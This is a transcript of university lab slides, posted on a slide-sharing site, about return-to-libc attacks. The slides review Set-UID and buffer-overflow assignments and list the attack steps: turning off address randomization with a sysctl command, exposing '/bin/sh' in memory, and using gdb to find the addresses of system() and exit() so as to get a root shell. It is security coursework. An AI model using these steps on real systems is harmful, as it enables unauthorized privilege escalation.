Return-to-libc Lab Zutao Zhu 09/25/2009.

Slides:



Advertisements
Similar presentations
Smashing the Stack for Fun and Profit
Advertisements

Program Development Tools The GNU (GNU’s Not Unix) Toolchain The GNU toolchain has played a vital role in the development of the Linux kernel, BSD, and.
Binghamton University CS-220 Spring 2015 Binghamton University CS-220 Spring 2015 Object Code.
Debugging What can debuggers do? Run programs Make the program stops on specified places or on specified conditions Give information about current variables’
Breno de MedeirosFlorida State University Fall 2005 Buffer overflow and stack smashing attacks Principles of application software security.
Race Condition Zutao Zhu 10/09/09. Outline Race Condition –Some functions –File format of /etc/passwd and /etc/shadow –Input Redirection Format-string.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
Buffer Overflow. Process Memory Organization.
Run-Time Storage Organization
Home: Phones OFF Please Unix Kernel Parminder Singh Kang Home:
Shuo Chen, Jun Xu, Emre C. Sezer, Prachi Gauriar, and Ravishankar K. Iyer Brett Hodges April 8, 2010.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Outline Midterm results Static variables Memory model
Buffer Overflows Lesson 14. Example of poor programming/errors Buffer Overflows result of poor programming practice use of functions such as gets and.
Runtime Environments Compiler Construction Chapter 7.
Brian E. Brzezicki. This tutorial just illustrates the underlying concepts of buffer overflows by way of an extremely simple stack overflow  Most buffer.
CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.
Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.
Lecture 9: Buffer Ovefflows and ROP EEN 312: Processors: Hardware, Software, and Interfacing Department of Electrical and Computer Engineering Spring 2014,
What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.
Shellcode Development -Femi Oloyede -Pallavi Murudkar.
Reminder Bomb lab is due tomorrow! Attack lab is released tomorrow!!
Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.
VM: Chapter 7 Buffer Overflows. csci5233 computer security & integrity (VM: Ch. 7) 2 Outline Impact of buffer overflows What is a buffer overflow? Types.
CS 140 Lecture Notes: Virtual MemorySlide 1 Load-Time Relocation Process 1 0 ∞ Process 3 Operating System Process 6.
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.
@Yuan Xue Worm Attack Yuan Xue Fall 2012.
Buffer Overflows ...or How I Learned to Never Trust the User
CS 140 Lecture Notes: Virtual Memory
Protecting Memory What is there to protect in memory?
Protecting Memory What is there to protect in memory?
More GDB, Intro to x86 Calling Conventions, Control Flow, & Lab 2
Recitation: Attack Lab
Lab 3 - Branching & Subroutines
CSC 495/583 Topics of Software Security Stack Overflows (2)
Recitation: Attack Lab
CS 140 Lecture Notes: Virtual Memory
CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst
SEED Workshop Buffer Overflow Lab
Recitation: Attack Lab
Software Security Lesson Introduction
Format String.
CS 140 Lecture Notes: Virtual Memory
Smashing the Stack for Fun and Profit
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.
CNT4704: Analysis of Computer Communication Network Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Fall 2011.
Week 2: Buffer Overflow Part 1.
Buffer Overflows.
Lecture 6: Multiprogramming and Context Switching
CS5123 Software Validation and Quality Assurance
Subject:Object oriented programming
CSE 153 Design of Operating Systems Winter 2019
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.
CS 140 Lecture Notes: Virtual Memory
Understanding and Preventing Buffer Overflow Attacks in Unix
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.
FIGURE Illustration of Stack Buffer Overflow
Several Tips on Project 1
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2010.
Format String Vulnerability
Return-to-libc Attacks
Race Condition Vulnerability
Lecture 3 - Instruction Set - Al
Presentation transcript:

Return-to-libc Lab Zutao Zhu 09/25/2009

Outline Review Set-UID assignment Discuss on Buffer-overflow Lab Return-to-libc

Review Set-UID assignment Capture screen, please. Need to describe and explain in detail about the assignment To prove you have root privilege, using printf(“This is my ls\n”) is not enough “Make myprog a Set-UID root program, and run it in the root account.”

Review Set-UID assignment Refer to lecture note: "To make sure Set-UID programs are safe from the manipulation of the LD PRELOAD environment variable, the runtime linker/loader (ld.so) will ignore this environment variable if the program is a Set-UID root program, unless the real UID is also zero."

Buffer-overflow The shell code in the stack is executed from low memory address to the high memory address. Use “disassemble main” to see the order

Buffer-overflow Stack frame for stack.c Use “info frame” and make sure you are inside the function call you are interested in.

Return-to-libc How to get the address of “system(), exit()” system call? How to expose some strings in memory? How to get the exposed string’s address? How to provide parameters for system calls?

Return-to-libc Step 1. /sbin/sysctl -w kernel.randomize_va_space=0 Step 2. link /bin/sh to /bin/zsh Step 3. expose “/bin/sh” to the memory Step 4. use gdb to get the address of “system()” and “exit()”. Step 5. get the address of “/bin/sh” Step 6. calculate the offset

Return-to-libc Chain the system call together

Return-to-libc Use “id” to check the current user information

Reference http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf http://milw0rm.org/papers/31

Questions?

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.